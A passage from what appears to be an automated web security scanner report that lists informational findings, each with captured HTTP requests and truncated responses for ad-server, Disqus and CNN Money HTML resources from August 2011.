Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:03:41 GMT
Server: lighttpd
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=1800
Content-Type: text/html
ETag: "498629554"
Last-Modified: Mon, 28 Feb 2011 17:56:59 GMT
P3P: policyref="/w3c/policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Age: 1375
Via: 1.1 iad105104000000 (MII-APC/2.0)
Via: 1.1 iad105103000000 (MII-APC/2.0)
x-Message1: Powered by Mirror Image Internet
Via: 1.1 iad107106000000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 8778

<html><head><script language="javascript">var VwVer="V3.00",VwBld="3.8_013 [02 28 2011]";var VwInDeliver2=true;String.prototype.VwIx=function(s){return this.toLowerCase().indexOf(s.toLowerCase());}
St
...[SNIP]...

18.48. http://d3.zedo.com/jsc/d3/bh.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/bh.html

Request

GET /jsc/d3/bh.html?n=740;g=20;a=1;s=1;t=r;rnd=5008278007153422 HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 25 Jul 2011 08:56:14 GMT
ETag: "2202a8c-43c-4a8e0fcc8c780"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1084
Cache-Control: max-age=227663
Expires: Thu, 18 Aug 2011 09:38:34 GMT
Date: Mon, 15 Aug 2011 18:24:11 GMT
Connection: close

<!--Copyright(c)2000-2008 ZEDO Inc. All Rights Reserved.-->
<HTML>
<body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<SCRIPT LANGUAGE="JavaScript">
var
...[SNIP]...

18.49. http://js.adsonar.com/js/pass.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /js/pass.html

Request

GET /js/pass.html?cb=79813 HTTP/1.1
Host: js.adsonar.com
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2011 15:16:10 GMT
ETag: "5ab-4a676ae738280"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 1451
Content-Type: text/html
Cache-Control: max-age=642
Expires: Mon, 15 Aug 2011 18:56:40 GMT
Date: Mon, 15 Aug 2011 18:45:58 GMT
Connection: close

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...

18.50. http://mediacdn.disqus.com/1313183665/build/system/def.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1313183665/build/system/def.html

Request

GET /1313183665/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=984705233015

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 12 Aug 2011 21:44:11 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 27097
X-Varnish: 618217575
Cache-Control: max-age=2343632
Expires: Sun, 11 Sep 2011 21:46:42 GMT
Date: Mon, 15 Aug 2011 18:46:10 GMT
Connection: close

<!DOCTYPE html>

<html>
<body>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//sigma.disqus.c
...[SNIP]...

18.51. http://mediacdn.disqus.com/1313183665/build/system/reply.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1313183665/build/system/reply.html

Request

GET /1313183665/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=984705233015; __qca=P0-1933763166-1313434043226; __utma=113869458.809336812.1313434043.1313434043.1313434043.1; __utmb=113869458.1.10.1313434043; __utmc=113869458; __utmz=113869458.1313434043.1.1.utmcsr=money.cnn.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/08/15/technology/google_motorola/index.htm

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 12 Aug 2011 21:44:16 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 33094
X-Varnish: 976824777 976823668
Cache-Control: max-age=2343558
Expires: Sun, 11 Sep 2011 21:46:33 GMT
Date: Mon, 15 Aug 2011 18:47:15 GMT
Connection: close


<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>


<style type="text/css">

...[SNIP]...

18.52. http://medleyads.com/spot/1082.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot/1082.html

Request

GET /spot/1082.html HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: group_history=2752=1; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1; __utmb=251326874.0.10.1313434615; __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:30 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
P3P: CP="DSP LAW"
Vary: Accept-Encoding
X-ApacheServer: ii86-39.friendfinderinc.com
Content-Length: 123
Content-Type: text/html


<html>
<head>
</head>
<body><img style="display:none" src='/spot_history?s=1082&a=6308&e=' width=1 height=1></body></html>

18.53. http://medleyads.com/spot/5022.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot/5022.html

Request

GET /spot/5022.html?SEX=&WANT_TO_MEET=&LOCATION=&AGE=&SMOKING= HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/p/memsearch.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; group_history=2752=1; s1082=6308=1; __utmb=251326874.0.10.1313434615; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:36 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
P3P: CP="DSP LAW"
Vary: Accept-Encoding
X-ApacheServer: ii70-18.friendfinderinc.com
Content-Length: 1027
Content-Type: text/html


<html>
<head>
</head>
<body><div style="text-align:center; vertical-align:middle;">
<script type="text/javascript"><!--
google_ad_client = "pub-1644008520393294";
/* FF:Search Results Top Leaderbo
...[SNIP]...

18.54. http://medleyads.com/spot/5023.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot/5023.html

Request

GET /spot/5023.html?SEX=&WANT_TO_MEET=&LOCATION=&AGE=&SMOKING= HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/p/memsearch.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; group_history=2752=1; s1082=6308=1; __utmb=251326874.0.10.1313434615; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:37 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
P3P: CP="DSP LAW"
Vary: Accept-Encoding
X-ApacheServer: ii111-44.friendfinderinc.com
Content-Length: 1059
Content-Type: text/html


<html>
<head>
</head>
<body><div style="text-align: center; vertical-align: middle;">
<a href=http://medleyads.com/spot/c/1313435137/1184953829/4155.html?MD=aHR0cDovL25vc3RyaW5nc2F0dGFjaGVkLmNvbS9nb
...[SNIP]...

18.55. http://medleyads.com/spot/5232.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot/5232.html

Request

GET /spot/5232.html HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:56 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
P3P: CP="DSP LAW"
Vary: Accept-Encoding
X-ApacheServer: ii111-49.friendfinderinc.com
Content-Length: 921
Content-Type: text/html


<html>
<head>
</head>
<body><iframe src="http://banners.adultfriendfinder.com/go/page/iframe_cm_24526?pid=p1865312.submad_12689_1_s5232&madirect=http://medleyads.com/spot/c/1313434556/187247422/3327.
...[SNIP]...

18.56. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.economy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.economy.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.economy.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:59 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:59 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2337

<div class="col1"><div class="boxHeading">Top Story</div><div class="summaryBlock"> <a href="/2011/08/15/news/economy/household_debt/index.htm" class="summaryImg"><img border="0" src="http://i2.cdn.
...[SNIP]...

18.57. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.fortune.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.fortune.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.fortune.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:48 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 3986

<div class="col1"><div class="boxHeading">Top Story</div> <div class="summaryBlock"> <a href="http://tech.fortune.cnn.com/2011/08/15/google-and-motorola-desperately-seeking-each-other/" class="summ
...[SNIP]...

18.58. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.leadership.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.leadership.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.leadership.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:59 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:49 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2986

<div class="col1"><div class="boxHeading">Top Story</div><div class="summaryBlock"> <a href="http://management.fortune.cnn.com/2011/08/15/dont-fight-the-last-recessions-war-youll-lose/" class="summa
...[SNIP]...

18.59. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.markets.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.markets.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.markets.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 4790

<div class="col1"><div class="boxHeading">Markets News</div><div class="summaryBlock"> <a href="/2011/08/15/markets/markets_newyork/index.htm" class="summaryImg"><img border="0" src="http://i2.cdn.t
...[SNIP]...

18.60. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.money.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.money.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.money.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:17 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 3334

<div class="col1"><div class="boxHeading">Top Story</div> <div class="summaryBlock"> <a href="/magazines/moneymag/bplive/2011/snapshots/PL0846355.html" class="summaryImg"><img border="0" src="http:
...[SNIP]...

18.61. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.news.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.news.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.news.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:23 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2531

<div class="col1"><div class="boxHeading">Top Story</div><div class="summaryBlock"> <a href="/2011/08/15/news/economy/household_debt/index.htm" class="summaryImg"><img border="0" src="http://i2.cdn.
...[SNIP]...

18.62. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.pf.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.pf.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.pf.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:02 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:50 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2710

<div class="col1"><div class="boxHeading">Top Story</div><div class="summaryBlock"> <a href="/magazines/moneymag/bplive/2011/snapshots/PL0846355.html" class="summaryImg"><img border="0" src="http://
...[SNIP]...

18.63. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.smallbusiness.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.smallbusiness.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.smallbusiness.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:59 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:43 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2943

<div class="col1"><div class="boxHeading">Top Story</div> <div class="summaryBlock"> <a href="/video/pf/2011/08/12/pf_bpl_solon_oh_beecology.moneymag" class="summaryImg"><img border="0" src="http://i
...[SNIP]...

18.64. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.tech.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.tech.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.tech.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
